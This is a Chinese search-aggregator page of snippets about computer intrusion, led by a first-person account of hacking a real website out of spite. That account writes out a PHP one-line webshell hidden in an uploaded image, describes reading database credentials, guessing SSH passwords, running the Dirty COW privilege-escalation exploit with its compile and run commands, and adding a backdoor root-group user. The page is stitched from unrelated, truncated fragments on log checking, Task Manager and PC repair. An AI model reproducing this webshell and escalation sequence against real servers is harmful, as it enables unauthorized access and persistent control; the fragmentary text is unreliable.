精华内容
下载资源
问答
  • 大概在去年的时候,对目标站实施了入侵,具体如下:本想着通过sql注入的方式方式爆出用户密码,通过sqlmap扫描注入发现没有注入点,但但得到了数据库是mysql。后来想着干脆自己去目标站注册一个账户。当然用户信息...

    注:本人是个菜鸟。

    一、利用文件上传漏洞获取webshell。

    确定要攻击的目标网站。

    图上的目标站域名过期了,只能通过ip地址访问。

    大概在去年的时候,对目标站实施了入侵,具体如下:

    本想着通过sql注入的方式方式爆出用户密码,通过sqlmap扫描注入发现没有注入点,但但得到了数据库是mysql。后来想着干脆自己去目标站注册一个账户。当然用户信息肯定是随便填的。登录成功之后发现我登录的用户有头像上传功能。而且有个默认的头像。通过右键查看图片得到当前图片路径。

    这回知道了路径。那么就开始吧。

    通过浏览目标站,得到目标站使用php语言。先准备一个php一句话木马 <?php @eval($_POST[pp]);?>。直接上传。那肯定是不成功的,校验了后缀格式。那么把 .php一句话木马后缀改为.jpg。在上传,使用brupsuite 抓包 再更改后缀为php,还是失败。既然普通的php码不能上传,那么就制作一个图片一句话木马。在图片里面植入一句话木马。

    直接上传制作好的图片木马。提示上传成功。右键查看我们上的木马图片。发现名称已经被替换成14828287266_3_image.jgp 这个。直接复制图片地址,使用中国菜刀进行连接木马,连接失败,不知道啥原因。百度搜索发现 IIS6.0有文件上传解析漏洞 如:1.php;2.jpg,是图片,但是在IIS6.0里解析的时候,是忽略掉分号后面的字串,直接解析为1.php,抓包再使用00截断上传,还是无果。正要放弃的时候,想到一个方法,将一个普通的图片直接右键编辑,在最底下加入php一句话木马,上传成功,使用中国菜连接居然连接上了。

    在通过访问这些目录找到目标站的数据库配置信息。

    获取目标站的数据库。连上数据库简单的看了下mysql版本为5.7.11。

    本来还想着利用mysql的system命令执行shell。结果这个版本没有这个命令

    mysql> system ls;

    1064 - You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'system ls' at line 1

    那么直接利用菜刀,上传一个php大马,来反弹一个shell。

    访问php大马。

    可以查看到当前服务器的版本信息。及所有用户。

    那么剩下了就是怎样提权了,当时对linux提权不是很熟,所有暂时先放下了。

    今年偶然也去目标站看看清况,看看我上传的大马有没有被管理员删除,直接访问网站,发现域名过期了,无法访问,再百度搜索该网站也搜不到,突然发现一篇帖子发现该网站管理员挺坏的啊。

    那么通过ping ip 看到服务器没有关闭。直接把域名换成ip访问大马,访问成功,看来管理员已经放弃了这个服务器。既然这个网站管理员这么坏,当然要搞他一波。

    二、liunx提权

    利用php大马看一下服务器版本为 linux 2.6.32-573.22.1 当前用户为 apache

    先上传一个 nc 来反弹当前shell 结果执行报错。

    既然nc用不了。那么直接用ssh 直连。简单猜测一下 root 密码。

    结果ssh一直连不上。通过端口扫描器,就只扫描到了80端口。

    我严重怀疑这个管理员修改了22端口。百度怎么修改22端口 发现在这个文件保存着端口信息 /etc/ssh/sshd_config 打开看看,发现管理员修改了端口为2222

    得到端口使用xshell工具用root账号简单的猜测了一下密码,无果。那么就试试普通用户。

    发现一个用户名跟目标站的域名一样。果断通过这个用户名 进行ssh连接,简单的使用了几个密码尝试了一下后,就输入用户名当作密码,竟然连上了。那么接下来就利用这个普通用户进行提权。百度一波linux提权,看到gcc编译漏洞普通用户提权为root比较简单,就按照这个方式进行提权

    执行到最后一行命令的时候。LD_AUDIT="\$ORIGIN"exec /proc/self/fd/3。就直接断开连接了。尝试几次之后果断放弃。

    在百度了一波后发现脏牛linux 漏洞对于2.6.22以上版本都有影响。刚好目标站版本为2.6.23。符合提权环境。脏牛Linux本地提权漏洞复现(CVE-2016-5195)​www.jianshu.com

    那么下载exp文件,上传到目标站的tmp目录(这里我用的是这个exp 也就是dirty.c文件)执行按照命令依次运行

    1、 gcc -pthread dirty.c -o dirty -lcrypt

    2、 ./dirty 密码 (这里的密码自己定义)

    大概等个几分钟。看到这段就说明成功了。这里firefart就是root权限的用户。密码就是刚刚运行的 ./dirty 密码 (自己输的密码)

    果断切换用户 su firefart 执行id查看当前权限。已经是root权限了。提权成功!

    接下来肯定是创建一个用户并赋予root权限啦

    useradd ceshi

    passwd ceshi

    usermod -g root ceshi

    成功执行!

    《中华人民共和国刑法》

    第二百八十五条

    【非法侵入计算机信息系统罪】违反国家规定,侵入国家事务、国防建设、尖端科学技术领域的计算机信息系统的,处三年以下有期徒刑或者拘役。

    【非法获取计算机信息系统数据、非法控制计算机信息系统罪】违反国家规定,侵入前款规定以外的计算机信息系统或者采用其他技术手段,获取该计算机信息系统中存储、处理或者传输的数据,或者对该计算机信息系统实施非法控制,情节严重的,处三年以下有期徒刑或者拘役,并处或者单处罚金;情节特别严重的,处三年以上七年以下有期徒刑,并处罚金。

    【提供侵入、非法控制计算机信息系统程序、工具罪】提供专门用于侵入、非法控制计算机信息系统的程序、工具,或者明知他人实施侵入、非法控制计算机信息系统的违法犯罪行为而为其提供程序、工具,情节严重的,依照前款的规定处罚。

    第二百八十六条

    【破坏计算机信息系统罪】违反国家规定,对计算机信息系统功能进行删除、修改、增加、干扰,造成计算机信息系统不能正常运行,后果严重的,处五年以下有期徒刑或者拘役;后果特别严重的,处五年以上有期徒刑。 违反国家规定,对计算机信息系统中存储、处理或者传输的数据和应用程序进行删除、修改、增加的操作,后果严重的,依照前款的规定处罚。 故意制作、传播计算机病毒等破坏性程序,影响计算机系统正常运行,后果严重的,依照第一款的规定处罚。

    结尾:不要干坏事哦!

    展开全文
  • 随着开源产品的越来越盛行,作为一个Linux运维工程师,能够清晰地鉴别异常机器是否已经被入侵了显得至关重要,个人结合自己的工作经历,整理了几种常见的机器被黑情况供参考。背景信息:以下情况是在CentOS6.9的系统...

    随着开源产品的越来越盛行,作为一个

    Linux

    运维工程师,能够清晰地鉴别

    异常机器是否已经被入侵了显得至关重要,个人结合自己的工作经历,

    整理了几种常见的

    机器被黑情况供参考。

    背景信息:以下情况是在

    CentOS 6.9

    的系统中查看的,其它

    Linux

    发行版类似。

    1.

    入侵者可能会删除机器的日志信息,可以查看日志信息是否还存在或者是否被清空,相

    关命令示例:

    2.

    入侵者可能创建一个新的存放用户名及密码文件,可以查看

    /etc/passwd

    /etc/shadow

    件,相关命令示例:

    3.

    入侵者可能修改用户名及密码文件,可以查看

    /etc/passwd

    /etc/shadow

    文件内容进行鉴

    别,相关命令示例:

    4.

    /var/log/lastlog

    ,相关命令示例:

    5.

    查看机器当前登录的全部用户,对应日志文件“

    /var/run/utmp

    ,相关命令示例:

    6.

    查看机器创建以来登陆过的用户,对应日志文件“

    /var/log/wtmp

    ,相关命令示例:

    7.

    查看机器所有用户的连接时间(小时)

    ,对应日志文件“

    /var/log/wtmp

    ,相关命令示例:

    8.

    如果发现机器产生了异常流量,

    可以使用命令

    tcpdump

    抓取网络包查看流量情况或者

    使用工具”

    iperf

    ”查看流量情况。

    9.

    可以查看

    /var/log/secure

    日志文件,尝试发现入侵者的信息,相关命令示例:

    展开全文
  • 伙伴们我们每天都在用电脑电脑和手机已经离不开了,可以说手机和电脑就是我们的左膀右臂。我们用电脑的时候,如果电脑卡了或者反应慢了,我们都会想到吧任务管理器调出来看看,可以说调出任务管理器就像医生看病...

    伙伴们我们每天都在用电脑,电脑和手机已经离不开了,可以说手机和电脑就是我们的左膀右臂。我们用电脑的时候,如果电脑卡了或者反应慢了,我们都会想到吧任务管理器调出来看看,可以说调出任务管理器就像医生看病一样,方便我们查看电脑哪里出了问题,出了什么问题,该怎么解决问题。

    24a463dbd11a9df32c195bc6cbbabb40.png

    调出任务管理器有几种方式。1.是按ctrl+atl+del 2 是ctrl+shift+esc 3.是在电脑任务栏右键选择任务管理器 4.是在运行里面输入taskmgr.exe 常见这4中打开任务管理器方式。

    6cb84f045f319c6f5721e6fb1e610f52.png

    下面我们来了解任务管理器吧。

    1.第一页应用程序

    红色指示的是表示我们正在运行的有窗口我们可以看到的程序。这些我们任务可以很方便的结束他们。也就是关闭他们。

    6e919fd03c0b43981d4e585ebcad59f7.png
    73977adab9ef68eb47e2966ebdef9f3e.png
    935a9ad47ef0ea2a02a9d990189ea0c6.png

    如果你开了多个窗口就可以看到多条应用程序,显示他们正在运行中 。

    2.第二页是进程,可以勾选显示所有用户的进程,你会看到很多进程,有我们打开的也有相同自身打开的,在这个页面可以看到进程占用内存的大小和消耗的处理器,如果想看看谁多占用了内存 ,一目了然。找到占用内存大户,结束进程。结束进程的时间要看看是不是系统自身的进程,我们不太懂的话不要结束系统的进程,可能会蓝屏重启的哦。有一些是安全软件的进程,那些是结束不掉的,他们为了保护电脑,不让在这里结束进程。我们可以手动找到安全软件退出就行了。

    4a9b6b7e5c21523a68879a049833194d.png
    e2744f8abd18a2ae06033d54c94762ff.png

    3.第三页是服务。这个页面可以看到系统里面的所有服务,查看他们的状态。系统服务是比较专业的,等伙伴们有更多的知识之后也是可以随便操作的。

    651eb1fa001c112bd6d910ad348c5f2e.png

    4.第四个页面就是性能页面了。这里可以青春的看到你电脑的内存是多大,你的电脑是几核的你的内存还剩下多少。还能看到更多的信息,比如有多少句柄,有多少活动线程,等等。对我们的电脑性能了然于心。当然了你们也会看到,我的这个笔记本是性能不怎么好的,才2个核心。

    b8dfd54c1f9dcd4ce7de8547b9225575.png
    e2536088da07d60ae279e5f2e806d3b8.png

    5.第五页面是联网。这里可以看到我们有几个网络适配器,我们的内网网络是10M的,还是100M的,或者是1G的。

    1386b2a80f92ec1114d0ed3895bcf0aa.png

    6.这个页面可能有人认为没啥用。但是我要说的是,这个页面很有用的。任务管理器是win系统的标配,在win 服务器系统上比如 server2012 server 2008上,我们可以看到有没有别人进入我们的电脑。如果有两个人登录了我们的服务器,在这个页面就会出现两个。当然在win7上不大可能会有两个人登录我们的电脑。

    507e54c80f274ee066072f4fafea12ef.png

    如果真有人入侵了我们的服务器那就选择那个用户,果断的选择断开它。然后查找那个用户,更改密码,杀毒和打补丁。配置严格的防火墙让他有来无回。

    好了。写了那么多,伙伴们对任务管理器应该有个深刻的了解了吧。多研究研究,你会有更多的收获,不久你也会是电脑高手的。

    a65063a51a16774009b71562c1b32462.png
    展开全文
  • 我花了一天时间精心整理本文,有百度的经典方案,有老师的精心传授,也有自己的实践总结,如果觉得有用就转发收藏吧:red_heart_selector:别忘点赞哦
  • 8年大神零基础电脑故障维修教程,60集视频+图解,新手送给你电脑硬盘故障维修技巧视频随着电脑的普及,不管是大学生还是上班族的电脑也陆续出现了许多故障问题,对学习与生活造成一定程度上的困扰,经过调查和了解,...

    8年大神零基础电脑故障维修教程,60集视频+图解,新手送给你

    58fe6adea79d848c9a7ffa25b4a98efb.png

    电脑硬盘故障维修技巧视频

    随着电脑的普及,不管是大学生还是上班族的电脑也陆续出现了许多故障问题,对学习与生活造成一定程度上的困扰,经过调查和了解,我们发现很多朋友在使用电脑过程中会遇到启动慢、蓝屏、死机、中病毒等各种情况,而这些问题如果报给厂家或经营者维修又会耽误大家的学习生活时间,如果去维修处维修又会因费用过高增加经济负担等等。

    070b841d17bf6c1db99718dbb9ea21bb.png

    电脑维修

    在使用电脑的过程中,难免会遇到许多的突发故障,这些故障的起因可能是软件原因造成的,也可能是硬件故障引发的,或是其它的因素……那么,我们这些初级的电脑用户们又该如何应对这些突发电脑故障事件呢没有人能保证自己的电脑一直不出现故障,电脑和电脑故障就像人和人的影子,你不知道什么时候它就会一下子出现在你的眼前:“昨天晚上还好好的,今天突然就开不了机了。”第一花费不少,第二耽误时间。如果你了解这些故障的原因,不仅可以自己维修电脑,还能让电脑的使用寿命更长。电脑在运行过程中经常会因为Windows系统或软件故障而死机或运行不稳定,严重地影响了工作效率,本章主要介绍电脑系统故障的基本处理方法。电脑故障的分类根据电脑的组成,可以将电脑故障分为硬件故障和软件故障两大类。

    a617aa4b58790af7df1eddaab343005b.png

    电脑维修

    电脑故障是指电脑硬件完好,由于电脑的系统配置不当、电脑病毒入侵或操作人员对软件使用不当等因素引起的电脑不能正常工作的故障。对于电脑操作人员来说,电脑因故障停机是经常遇到的事情,其原因除少数是硬件质量问题外,绝大多数是由于软件故障造成的。软件故障大致分为软件兼容故障、系统配置故障、病毒故障、操作故障等。

    9802227c70cb191f8fa1b92dbe82d29b.png

    电脑维修

    有些朋友,系统重装了八九十几次了,自己还是不会装,不是找别人帮忙就是去维修店,这种人可能是真的对电脑不感兴趣或者不入门或者不用心去学,当然,你如果感兴趣的话肯定就会自己用心去学了,所以,归根到底还是兴趣的问题,你有兴趣了,自然可以钻进去,自学就会很简单。所以,最重要的是兴趣,其次,你要有一台电脑,不要把电脑当成宝,该实践的时候还是要实践一下,拆开再装上,会装机了不?最后,一定要积累,学习,不要怕电脑出问题,出了问题解决了,你的水平就会上升一步。

    963b3b39c650aa7c8e83fb1ac98600ee.png

    电脑维修

    掌握一些电脑维修的基本检测方法,是解决电脑故障的必备基础知识,如果你懂得这些知识也许当你的机器出现问题的时候不必马上抱去维修站,自己就能解决,省事又方便,而且不怕被坑。

    a6a649abf711334c9a49c9e8e4115224.png
    展开全文
  • s扫描器,是别人入侵电脑留下的,应该是有用的吧
  • 入侵电脑

    千次阅读 2018-07-10 18:23:14
    入侵电脑对于新手来说是个很繁大的工程,因为‘黑客’这方面到知识涉及到知识很多,而且每出一种漏洞你得对有这种漏洞到软件或者系统有相当到理解,利用别人到工具虽然可以入侵,但是不是长久之计,而且也没有多少...
  • 用tomcat服务器部署网站,电脑会不会被别人攻击入侵?需要做什么安全防范措施吗?
  • 黑客木马入侵个人电脑的方法

    千次阅读 2007-05-16 18:49:00
    现在攻击个人电脑的木马软件很多,功能比以前多了,使用也比以前方便多了,所以危害也比以前大了,奇奇发现很多人中了木马自己还不知道,我就写了一点心得,给大家作个参考。... 你在网络上冲浪,别人和你聊天,
  • 请问如果想不靠网上的工具,自己靠技术入侵别人电脑有可能吗?如果有,需要学习哪些方面的知识呢,求高手指教一条正确的路线!
  • 我昨天讲解在Servlet程序中如何读写资源时,讲到了如果一个Servlet或JSP程序能够读写当前计算机上的任意目录的话,那么采用Tomcat对外出租虚拟主机时,就会出现安全问题,因为别人上传的Servlet/JSP程序可以浏览...
  • 黑客是如何入侵服务器的

    千次阅读 2019-05-12 18:39:14
    黑客是如何入侵别人电脑的? 黑客控制别人的电脑方式大概有几个角度 1.如果是一台web服务器的话,可以从web漏洞;数据库以及中间件的漏洞入手 2.如果是一台个人pc电脑的话,可以从系统的漏洞入手,大部分以缓冲区...
  • 黑客已经成为一种文化,很多人想成为黑客,他们偶尔学到了几种小花招,总喜欢拿别人开玩笑,搞些恶作剧。其实黑客的最高境界在于防守,不在于进攻。所谓明枪易躲暗箭难防,要防住他人所有的进攻,肯定需要懂得比对方...
  • 防止“黑客”进如你的电脑是靠防火墙技术的。windows98系统极其不稳定、网络能力差、容易崩溃死机,现在基本没有用户使用了。windows2000、windowsNT现在还有不少用户在使用,对于机器... 阻止别人侵入你的电脑,靠
  • IPC入侵全集

    2012-12-31 13:36:55
    IPC入侵技术详解,叫你如何入侵别人电脑,菜鸟也能学会,快点下载吧
  • 电脑系统 > 操作系统 > 电脑城   【教程】在这个网络时代,每个人都可以轻易地从网络上得到各种简单易用的黑客工具,于是,“黑客” 就诞生了。这些人多半是一些无所事事的网虫,天生就有破坏的欲望。于是...
  • 警告:请不要使用本文重涉及的任何方法进行认行违法行为 基础知识 在讲正题前先了解一下基本的知识吧:一些恶意入侵系统并进行摧毁的人叫cracker,而一些只会使用别人开发的工具去入侵的叫做scriptkiddies....
  • 今天开机,突然发现新增了一个名为piress的账户,突然间就意识到我的电脑可能被入侵了。后来发现网上很多人都遇到这样的问题。经过一步步的查证,原来最近MySQL爆出一个安全漏洞,远程登录mysql,尝试225次后就可以...
  • 简单入侵操作

    2020-06-30 20:29:01
    别人不在的时间操作他人电脑 打开cmd 输入:net share c$=c:\(将他的磁盘共享出去,同时也要打开电脑上的允许远程操控权限) 然后ipconfig下,记录他的ip 写好.bat脚本。 net user admin 123456 /add ...
  • 电脑病毒一旦入侵到我们的电脑中,需要加载才能造成破坏,因为一个没有加载启动的病毒是没有什么危害的。那么,病毒在进入电脑系统之后,不通过用户双击,会有怎样的办法让自己自动加载执行呢?我们今天就来看一下...
  • 之前,我写了使用cmd查看电脑连接过的wifi密码(二)和使用cmd查看...(大家在使用过程中有问题可以留言我,我会改进本程序)  注意本软件只用于学习和正当途径,如果有人恶意入侵别人电脑造成财产损失,或个人信...
  • 今天开机,突然发现新增了一个名为piress的账户,突然间就意识到我的电脑可能被入侵了。后来发现网上很多人都遇到这样的问题。经过一步步的查证,原来最近mysql爆出一个安全漏洞,远程登录mysql,尝试225次后就可以...
  • 题记今天开机,突然发现新增了一个名为piress的账户,突然间就意识到我的电脑可能被入侵了。后来发现网上很多人都遇到这样的问题。经过一步步的查 证,原来最近mysql爆出一个安全漏洞,远程登录mysql,尝试225次后就...

空空如也

空空如也

1 2 3 4 5 ... 9
收藏数 175
精华内容 70
关键字:

入侵别人电脑